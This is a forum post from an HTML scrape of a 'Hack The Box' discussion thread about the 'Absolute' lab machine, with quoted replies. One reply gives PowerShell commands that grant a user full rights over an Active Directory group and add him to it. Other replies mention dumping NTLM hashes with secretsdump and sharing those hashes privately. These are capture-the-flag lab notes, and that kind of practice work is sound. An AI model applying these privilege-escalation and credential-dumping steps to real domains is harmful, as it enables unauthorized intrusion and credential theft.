<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=571089#pid571089" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=571089#pid571089" title="RE: Absolute - HTB [Discussion]">#154</a></strong>
</div>
</div>
<span class="post_date"><span title="October 1, 2022, 11:10 AM">7 hours ago</span> <span class="post_edit" id="edited_by_571089"></span></span>
</div>
<div class="post_body scaleimages" id="pid_571089">
<blockquote class="mycode_quote"><cite><span> (<span title="October 1, 2022, 10:25 AM">8 hours ago</span>)</span>yumi Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=570713#pid570713" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="October 1, 2022, 10:10 AM">8 hours ago</span>)</span>fl0mms Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=570622#pid570622" rel="nofollow"></a></cite>I have a problem using pywhisker ( [!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0,<br>
problem 4003 (INSUFF_ACCESS_RIGHTS), data 0 )<br>
<br>
it has a solution?</br></br></br></blockquote><br/>
yes do again<br/>
<br/>
$dc_domain="absolute.htb"<br/>
<br/>
$SecPassword = ConvertTo-SecureString "Password" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
<br/>
request new tgt from linux, and try again<br/>
<hr class="mycode_hr"/>
<blockquote class="mycode_quote"><cite><span> (<span title="October 1, 2022">Today</span>, 04:30 AM)</span>optimusoggy Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=568940#pid568940" rel="nofollow"></a></cite><a class="mycode_url" href="https://meowmeowattack.wordpress.com/2022/10/01/hackthebox-htb-writeup-absolute/" rel="noopener" target="_blank">https://meowmeowattack.wordpress.com/202...-absolute/</a><br/>
<hr class="mycode_hr"/>
<blockquote class="mycode_quote"><cite><span> (<span title="September 30, 2022">Yesterday</span>, 11:10 PM)</span>yumi Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=567644#pid567644" rel="nofollow"></a></cite>secretsdump worked get NTLM hash now<br/>
<hr class="mycode_hr"/>
got root finally its simple thing kkkkkk<br/>
<hr class="mycode_hr"/>
i was putting administrator but i have to put DC$ &gt;&lt; i was tired</blockquote><br/>
your secretsdump needed for this might be</blockquote><br/>
you mean NTLM hash ?<br/>
<hr class="mycode_hr"/>
@<a class="mycode_mention" href="https://breached.to/User-optimusoggy"><span class="rf_noob">optimusoggy</span></a> i will send a NTLM hash to you check PM</blockquote><br/>
Can you send me the NTLM hash too?
				</div>
<div class="post_meta" id="post_meta_571089">
<div class="float_right">
</div>
</div>